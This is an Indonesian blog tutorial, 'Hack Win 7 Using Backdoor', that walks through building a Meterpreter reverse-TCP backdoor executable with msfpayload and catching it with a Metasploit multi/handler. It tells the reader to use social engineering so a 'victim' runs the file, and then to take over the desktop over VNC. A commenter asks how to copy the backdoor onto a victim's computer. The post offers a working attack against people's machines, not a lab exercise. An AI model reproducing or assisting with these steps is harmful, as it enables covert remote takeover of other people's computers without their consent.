Hack Win 7 Using Backdoor

Berjumpa lagi dengan saya :D
Sambil nunggu buka puasa ane jalan-jalan dulu naik om goole, terus ane berjumpa sama yang namanya backdoor, langsung ke inget sama my Backtrack .... Emang  T.O.P Bgt deh Backtrack .. :D
langsung saja ane buka Backtrack ane .

oke , sesuai judul di atas kali ini ane akan Sering cara Hack Win 7 dengan menggunakan Backdoor yang kita buat sendiri ...
oke kita langsung saja ke TKP



Sekilas tentang Backdoor
Backdoor atau "pintu belakang", dalam keamanan sistem komputer, merujuk kepada mekanisme yang dapat digunakan untuk mengakses sistem, aplikasi, atau jaringan, selain dari mekanisme yang umum digunakan (melalui proses logon atau proses autentikasi lainnya). Disebut juga sebagai back door. ( Wikipedia )


dalam kasus ini ane pake Backtrack 5 R2
oke 


1. buka Console / terminal kesayangan anda 
2. terus ketikan syntax nya 

    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.3 x > ieanx.exe
         
ket.
 # windows/meterpreter/reverse_tcp = PAYLOAD 
 # LHOST=192.168.0.132 = ip kita 
 # ieanx.exe = nama file untuk backdoor atau terserah anda mau dikasih nama apa 
3. ketik lagi syntax 
msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.2.3 E


secara otomastis akan di lanjutkan ke metasploit
ket. 
 # exploit/multi/handler = exploit yang kita gunakan
 # PAYLOAD=windows/meterpreter/reverse_tcp = PAYLOAD , harus sama dengan PAYLOAD pembuatan        backdoor


4. Jika sudah membuka metasploit anda tinggal memastikan backdoor yang tadi dibuat ( ieanx.exe ) di eksekusi oleh korban, dalam hal ini saya menggunakan teknik social engineering supaya korban bisa mengEksekusi backdoor yang tadi di buat ..


5. ketika korban mengeksekusi file backdoor, maka secara otomatis akan membuka sesi meterpreter >


ini penampakan yang ane buat ,, ane menggunakan fasilitas vnc untuk meremote dekstop korban .. :)



oke , ane pamit dulu dari hadapan layar  :)
semoga bermanfaat :D
salam::Micro Code




Comments

Unknown said…
selamat siang mas, sangat membantu sekali untuk coba2 hacking bagi pemula.
yang saya tanyakan, file ieanx.exe nya itu ngliatnya dmna, biar qta bsa kopikn ke komputer korban. terima kasih